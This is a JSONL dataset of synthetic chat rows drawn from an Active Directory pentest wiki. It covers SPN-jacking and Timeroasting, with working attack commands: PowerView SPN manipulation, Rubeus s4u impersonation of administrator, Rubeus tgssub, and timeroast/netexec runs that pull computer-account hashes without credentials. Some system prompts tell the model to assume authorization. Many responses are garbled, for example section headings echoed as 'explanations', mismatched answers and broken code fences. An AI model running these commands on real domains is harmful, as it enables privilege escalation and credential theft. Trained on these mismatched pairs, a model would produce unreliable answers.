Ticket](ptt.md) to access the target.`?"}, {"role": "assistant", "content": "This command is used for 5. edit the ticket's spn (service class and/or hostname). 5. Edit the ticket's SPN (service class and/or hostname)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the Ticket](ptt.md) to access the target.`?", "response": "This command is used for 5. edit the ticket's spn (service class and/or hostname). 5. Edit the ticket's SPN (service class and/or hostname)", "metadata": {"corpus_index": 743, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 1. show SPNs listed in the KCD configuration work?"}, {"role": "assistant", "content": "Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 1. show SPNs listed in the KCD configuration work?", "response": "Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo'", "metadata": {"corpus_index": 744, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 1. show SPNs listed in the KCD configuration"}, {"role": "assistant", "content": "Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 1. show SPNs listed in the KCD configuration", "response": "Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo'", "metadata": {"corpus_index": 744, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 2. remove SPN from ServerB if required (live SPN-jacking)"}, {"role": "assistant", "content": "Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 2. remove SPN from ServerB if required (live SPN-jacking)", "response": "Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName'", "metadata": {"corpus_index": 745, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 2. remove SPN from ServerB if required (live SPN-jacking)?"}, {"role": "assistant", "content": "Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 2. remove SPN from ServerB if required (live SPN-jacking)?", "response": "Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName'", "metadata": {"corpus_index": 745, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 3. add SPN to serverC work?"}, {"role": "assistant", "content": "Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 3. add SPN to serverC work?", "response": "Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'}", "metadata": {"corpus_index": 746, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 3. add SPN to serverC?"}, {"role": "assistant", "content": "Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 3. add SPN to serverC?", "response": "Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'}", "metadata": {"corpus_index": 746, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/serverB\" /impersonateuser:\"administrator\" /domain:\"$DOMAIN\" /user:\"$USER\" /password:\"$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/serverB\" /impersonateuser:\"administrator\" /domain:\"$DOMAIN\" /user:\"$USER\" /password:\"$PASSWORD\"", "metadata": {"corpus_index": 747, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy during a pentest?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/serverB\" /impersonateuser:\"administrator\" /domain:\"$DOMAIN\" /user:\"$USER\" /password:\"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy during a pentest?", "response": "Rubeus.exe s4u /nowrap /msdsspn:\"cifs/serverB\" /impersonateuser:\"administrator\" /domain:\"$DOMAIN\" /user:\"$USER\" /password:\"$PASSWORD\"", "metadata": {"corpus_index": 747, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 5. Edit the ticket's SPN (service class and/or hostname)"}, {"role": "assistant", "content": "Rubeus.exe tgssub /nowrap /altservice:\"host/serverC\" /ticket:\"ba64ticket\"\n```\n\nOnce the final service ticket is obtained, it can be used with Pass the Ticket to access the target.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 5. Edit the ticket's SPN (service class and/or hostname)", "response": "Rubeus.exe tgssub /nowrap /altservice:\"host/serverC\" /ticket:\"ba64ticket\"\n```\n\nOnce the final service ticket is obtained, it can be used with Pass the Ticket to access the target.\n\n:::", "metadata": {"corpus_index": 748, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 5. Edit the ticket's SPN (service class and/or hostname)"}, {"role": "assistant", "content": "Rubeus.exe tgssub /nowrap /altservice:\"host/serverC\" /ticket:\"ba64ticket\"\n```\n\nOnce the final service ticket is obtained, it can be used with Pass the Ticket to access the target.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 5. Edit the ticket's SPN (service class and/or hostname)", "response": "Rubeus.exe tgssub /nowrap /altservice:\"host/serverC\" /ticket:\"ba64ticket\"\n```\n\nOnce the final service ticket is obtained, it can be used with Pass the Ticket to access the target.\n\n:::", "metadata": {"corpus_index": 748, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Timeroasting - Theory?"}, {"role": "assistant", "content": "Timeroasting is an attack technique that abuses Microsoft's proprietary NTP extension to extract password-equivalent hashes for computer and trust accounts from domain controllers without requiring authentication. These hashes can subsequently be cracked offline.\n\nDomain-joined computers synchronize their system clocks using NTP, with domain controllers acting as authoritative time sources. To address NTP's lack of authentication, Microsoft implemented a custom extension that cryptographically authenticates NTP responses using computer account credentials.\n\nWhen a computer requests time synchronization, it includes its computer account's RID (Relative Identifier) in the NTP request. The domain controller responds with a Message Authentication Code (MAC) computed using the computer account's NTLM hash as the key. This design allows unauthenticated clients to request salted password hashes for any computer account in the domain by specifying different RID values.\n\n> [!NOTE]\n> Authentication to the domain controller is not required to make NTP requests. An attacker can query any RID, and the server will respond with a MAC computed using that account's password hash.\n\nWhile this presents no security risk when computer accounts use strong, randomly generated passwords, many Active Directory environments contain accounts with weak or default passwords, particularly those created through legacy methods or manual provisioning processes.\n\nUnlike Kerberoasting, Timeroasting returns only RIDs rather than computer account names. To map RIDs to hostnames, attackers can leverage SMB NULL session enumeration if available, or correlate successfully cracked passwords against a list of known computer names gathered through reconnaissance."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Timeroasting - Theory?", "response": "Timeroasting is an attack technique that abuses Microsoft's proprietary NTP extension to extract password-equivalent hashes for computer and trust accounts from domain controllers without requiring authentication. These hashes can subsequently be cracked offline.\n\nDomain-joined computers synchronize their system clocks using NTP, with domain controllers acting as authoritative time sources. To address NTP's lack of authentication, Microsoft implemented a custom extension that cryptographically authenticates NTP responses using computer account credentials.\n\nWhen a computer requests time synchronization, it includes its computer account's RID (Relative Identifier) in the NTP request. The domain controller responds with a Message Authentication Code (MAC) computed using the computer account's NTLM hash as the key. This design allows unauthenticated clients to request salted password hashes for any computer account in the domain by specifying different RID values.\n\n> [!NOTE]\n> Authentication to the domain controller is not required to make NTP requests. An attacker can query any RID, and the server will respond with a MAC computed using that account's password hash.\n\nWhile this presents no security risk when computer accounts use strong, randomly generated passwords, many Active Directory environments contain accounts with weak or default passwords, particularly those created through legacy methods or manual provisioning processes.\n\nUnlike Kerberoasting, Timeroasting returns only RIDs rather than computer account names. To map RIDs to hostnames, attackers can leverage SMB NULL session enumeration if available, or correlate successfully cracked passwords against a list of known computer names gathered through reconnaissance.", "metadata": {"corpus_index": 749, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Timeroasting - Theory"}, {"role": "assistant", "content": "Timeroasting is an attack technique that abuses Microsoft's proprietary NTP extension to extract password-equivalent hashes for computer and trust accounts from domain controllers without requiring authentication. These hashes can subsequently be cracked offline.\n\nDomain-joined computers synchronize their system clocks using NTP, with domain controllers acting as authoritative time sources. To address NTP's lack of authentication, Microsoft implemented a custom extension that cryptographically authenticates NTP responses using computer account credentials.\n\nWhen a computer requests time synchronization, it includes its computer account's RID (Relative Identifier) in the NTP request. The domain controller responds with a Message Authentication Code (MAC) computed using the computer account's NTLM hash as the key. This design allows unauthenticated clients to request salted password hashes for any computer account in the domain by specifying different RID values.\n\n> [!NOTE]\n> Authentication to the domain controller is not required to make NTP requests. An attacker can query any RID, and the server will respond with a MAC computed using that account's password hash.\n\nWhile this presents no security risk when computer accounts use strong, randomly generated passwords, many Active Directory environments contain accounts with weak or default passwords, particularly those created through legacy methods or manual provisioning processes.\n\nUnlike Kerberoasting, Timeroasting returns only RIDs rather than computer account names. To map RIDs to hostnames, attackers can leverage SMB NULL session enumeration if available, or correlate successfully cracked passwords against a list of known computer names gathered through reconnaissance."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Timeroasting - Theory", "response": "Timeroasting is an attack technique that abuses Microsoft's proprietary NTP extension to extract password-equivalent hashes for computer and trust accounts from domain controllers without requiring authentication. These hashes can subsequently be cracked offline.\n\nDomain-joined computers synchronize their system clocks using NTP, with domain controllers acting as authoritative time sources. To address NTP's lack of authentication, Microsoft implemented a custom extension that cryptographically authenticates NTP responses using computer account credentials.\n\nWhen a computer requests time synchronization, it includes its computer account's RID (Relative Identifier) in the NTP request. The domain controller responds with a Message Authentication Code (MAC) computed using the computer account's NTLM hash as the key. This design allows unauthenticated clients to request salted password hashes for any computer account in the domain by specifying different RID values.\n\n> [!NOTE]\n> Authentication to the domain controller is not required to make NTP requests. An attacker can query any RID, and the server will respond with a MAC computed using that account's password hash.\n\nWhile this presents no security risk when computer accounts use strong, randomly generated passwords, many Active Directory environments contain accounts with weak or default passwords, particularly those created through legacy methods or manual provisioning processes.\n\nUnlike Kerberoasting, Timeroasting returns only RIDs rather than computer account names. To map RIDs to hostnames, attackers can leverage SMB NULL session enumeration if available, or correlate successfully cracked passwords against a list of known computer names gathered through reconnaissance.", "metadata": {"corpus_index": 749, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Timeroasting - Practice"}, {"role": "assistant", "content": "Timeroasting can be performed in two contexts: unauthenticated (for initial access) and authenticated (for lateral movement or privilege escalation). Each approach offers distinct advantages."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Timeroasting - Practice", "response": "Timeroasting can be performed in two contexts: unauthenticated (for initial access) and authenticated (for lateral movement or privilege escalation). Each approach offers distinct advantages.", "metadata": {"corpus_index": 750, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Timeroasting - Practice"}, {"role": "assistant", "content": "Timeroasting can be performed in two contexts: unauthenticated (for initial access) and authenticated (for lateral movement or privilege escalation). Each approach offers distinct advantages."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Timeroasting - Practice", "response": "Timeroasting can be performed in two contexts: unauthenticated (for initial access) and authenticated (for lateral movement or privilege escalation). Each approach offers distinct advantages.", "metadata": {"corpus_index": 750, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Timeroasting - Unauthenticated Timeroasting"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> Unlike Kerberoasting, unauthenticated Timeroasting can be carried out without any prior foothold (no valid domain credentials required).\n\nThis approach is particularly valuable for initial access scenarios where no domain credentials are available. However, it only returns RIDs rather than computer names, requiring additional steps to map hashes to specific accounts.\n\n::: tabs\n\n=== UNIX-like\n\nThe Timeroast (Python) tool can extract computer account password hashes from a domain controller.\n\n``bash\npython3 timeroast.py \"$DC_IP\"\n`\n\nAlternatively, NetExec (formerly CrackMapExec) includes a Timeroasting module that can perform the attack without authentication.\n\n`bash\nnetexec smb \"$DC_IP\" -M timeroast\n`\n\n=== Windows\n\nThe Timeroast (PowerShell) tool can be used to perform the attack from Windows systems.\n\n`powershell\n. .\\timeroast.ps1\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Timeroasting - Unauthenticated Timeroasting", "response": "> [!IMPORTANT]\n> Unlike Kerberoasting, unauthenticated Timeroasting can be carried out without any prior foothold (no valid domain credentials required).\n\nThis approach is particularly valuable for initial access scenarios where no domain credentials are available. However, it only returns RIDs rather than computer names, requiring additional steps to map hashes to specific accounts.\n\n::: tabs\n\n=== UNIX-like\n\nThe Timeroast (Python) tool can extract computer account password hashes from a domain controller.\n\n``bash\npython3 timeroast.py \"$DC_IP\"\n`\n\nAlternatively, NetExec (formerly CrackMapExec) includes a Timeroasting module that can perform the attack without authentication.\n\n`bash\nnetexec smb \"$DC_IP\" -M timeroast\n`\n\n=== Windows\n\nThe Timeroast (PowerShell) tool can be used to perform the attack from Windows systems.\n\n`powershell\n. .\\timeroast.ps1\n``\n\n:::", "metadata": {"corpus_index": 751, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Timeroasting - Unauthenticated Timeroasting"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> Unlike Kerberoasting, unauthenticated Timeroasting can be carried out without any prior foothold (no valid domain credentials required).\n\nThis approach is particularly valuable for initial access scenarios where no domain credentials are available. However, it only returns RIDs rather than computer names, requiring additional steps to map hashes to specific accounts.\n\n::: tabs\n\n=== UNIX-like\n\nThe Timeroast (Python) tool can extract computer account password hashes from a domain controller.\n\n``bash\npython3 timeroast.py \"$DC_IP\"\n`\n\nAlternatively, NetExec (formerly CrackMapExec) includes a Timeroasting module that can perform the attack without authentication.\n\n`bash\nnetexec smb \"$DC_IP\" -M timeroast\n`\n\n=== Windows\n\nThe Timeroast (PowerShell) tool can be used to perform the attack from Windows systems.\n\n`powershell\n. .\\timeroast.ps1\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Timeroasting - Unauthenticated Timeroasting", "response": "> [!IMPORTANT]\n> Unlike Kerberoasting, unauthenticated Timeroasting can be carried out without any prior foothold (no valid domain credentials required).\n\nThis approach is particularly valuable for initial access scenarios where no domain credentials are available. However, it only returns RIDs rather than computer names, requiring additional steps to map hashes to specific accounts.\n\n::: tabs\n\n=== UNIX-like\n\nThe Timeroast (Python) tool can extract computer account password hashes from a domain controller.\n\n``bash\npython3 timeroast.py \"$DC_IP\"\n`\n\nAlternatively, NetExec (formerly CrackMapExec) includes a Timeroasting module that can perform the attack without authentication.\n\n`bash\nnetexec smb \"$DC_IP\" -M timeroast\n`\n\n=== Windows\n\nThe Timeroast (PowerShell) tool can be used to perform the attack from Windows systems.\n\n`powershell\n. .\\timeroast.ps1\n``\n\n:::", "metadata": {"corpus_index": 751, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the python3 command to timeroasting - unauthenticated timeroasting"}, {"role": "assistant", "content": "python3 timeroast.py \"$DC_IP\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the python3 command to timeroasting - unauthenticated timeroasting", "response": "python3 timeroast.py \"$DC_IP\"", "metadata": {"corpus_index": 752, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Timeroasting - Unauthenticated Timeroasting"}, {"role": "assistant", "content": "python3 timeroast.py \"$DC_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Timeroasting - Unauthenticated Timeroasting", "response": "python3 timeroast.py \"$DC_IP\"", "metadata": {"corpus_index": 752, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 timeroast.py \"$DC_IP\"`?"}, {"role": "assistant", "content": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 timeroast.py \"$DC_IP\"`?", "response": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting", "metadata": {"corpus_index": 752, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the netexec command to timeroasting - unauthenticated timeroasting"}, {"role": "assistant", "content": "netexec smb \"$DC_IP\" -M timeroast"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the netexec command to timeroasting - unauthenticated timeroasting", "response": "netexec smb \"$DC_IP\" -M timeroast", "metadata": {"corpus_index": 753, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Timeroasting - Unauthenticated Timeroasting"}, {"role": "assistant", "content": "netexec smb \"$DC_IP\" -M timeroast"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Timeroasting - Unauthenticated Timeroasting", "response": "netexec smb \"$DC_IP\" -M timeroast", "metadata": {"corpus_index": 753, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb \"$DC_IP\" -M timeroast`?"}, {"role": "assistant", "content": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb \"$DC_IP\" -M timeroast`?", "response": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting", "metadata": {"corpus_index": 753, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Timeroasting - Unauthenticated Timeroasting"}, {"role": "assistant", "content": ". .\\timeroast.ps1"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Timeroasting - Unauthenticated Timeroasting", "response": ". .\\timeroast.ps1", "metadata": {"corpus_index": 754, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `. .\\timeroast.ps1`?"}, {"role": "assistant", "content": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `. .\\timeroast.ps1`?", "response": "This command is used for timeroasting - unauthenticated timeroasting. Unauthenticated Timeroasting", "metadata": {"corpus_index": 754, "category": "credentials", "source_file": "docs/src/ad/movement/kerberos/timeroast.md", "page_title": "Timeroasting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Timeroasting - Authenticated Timeroasting"}, {"role": "assistant", "content": "Performing Timeroasting with valid domain credentials offers distinct advantages, making it valuable beyond initial access scenarios:\n\n* Automatic RID-to-hostname mapping: When authenticated, RIDs can be automatically resolved to their corresponding computer account names through Active Directory queries, eliminating the need for manual correlation or SMB NULL session enumeration.\n* Improved cracking performance: SNTP hashes extracted via Timeroasting can be cracked approximately 10 times faster than traditional Kerberos TGS-REP (etype 23) hashes. While this does not make randomly generated machine passwords crackable, it significantly improves success rates when targeting weak passwords, particularly in environments with poor password hygiene or legacy provisioning processes.\n* Enhanced operational security: While Kerberoasting can be modified to target computer accounts by requesting Service Principal Names (SPNs) for all systems, this approach generates substantial network traffic and is more likely to be detected. Timeroasting produces less conspicuous network patterns and remains a relatively obscure technique, making it more suitable for stealth-focused red team operations.\n\n> [!NOTE]\n> Authenticated Timeroasting might appear redundant since tools like Rubeus or 